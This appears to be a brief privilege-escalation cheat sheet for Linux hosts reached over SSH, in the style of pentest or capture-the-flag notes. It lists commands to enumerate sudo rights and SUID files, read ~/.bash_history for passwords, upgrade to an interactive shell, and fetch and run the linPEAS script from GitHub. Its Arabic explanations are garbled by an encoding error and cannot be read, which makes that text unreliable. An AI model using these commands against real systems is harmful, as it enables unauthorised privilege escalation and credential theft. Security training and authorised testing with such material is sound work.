# SSH Privilege Escalation (Port 22)

## sudo -l
๐น ูุนุฑุถ ุงูุฃูุงูุฑ ุงูุชู ูููู ุชุดุบูููุง ุจุงุณุชุฎุฏุงู sudo ุจุฏูู ุงูุญุงุฌุฉ ุฅูู ูููุฉ ูุฑูุฑ.

## find / -perm -4000 2>/dev/null
๐น ูุจุญุซ ูู ุงููุธุงู ุนู ูููุงุช SUID ุงูุชู ูุฏ ุชููู ูุงุจูุฉ ููุงุณุชุบูุงู ูุฑูุน ุงูุตูุงุญูุงุช.

## cat ~/.bash_history
๐น ูุณุชุนุฑุถ ุงูุฃูุงูุฑ ุงูุณุงุจูุฉ ุงูุชู ููุฐูุง ุงููุณุชุฎุฏูุ ูููู ุชูุดู ุจุงุณูุฑุฏ ุฃู ูุนูููุงุช ูููุฉ.

## python3 -c 'import pty; pty.spawn("/bin/bash")'
๐น ูุนุทูู shell ุชูุงุนูู ุฃูุถู.

## export TERM=xterm
๐น ูุถุจุท ุงูุจูุฆุฉ ูุชููู ูุชูุงููุฉ ูุน ุงูุชูุฑููุงู.

## (ูู ุญุงู ุฃูููุช ุงูู shell ูุคูุชูุง ุจุงุณุชุฎุฏุงู Ctrl+Z)
stty raw -echo; fg
๐น ูุนูุฏ ุถุจุท ุงูุชูุฑููุงู ุจุนุฏ ุงุณุชุฆูุงู ุงูู shell.

## linPEAS (ูุญุต ูุชูุฏู ูููุธุงู)
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
๐น ุณูุฑุจุช ูุชูุงูู ูุชุญููู ุงููุธุงู ูุงูุจุญุซ ุนู ุทุฑู ุฑูุน ุงูุตูุงุญูุงุช.
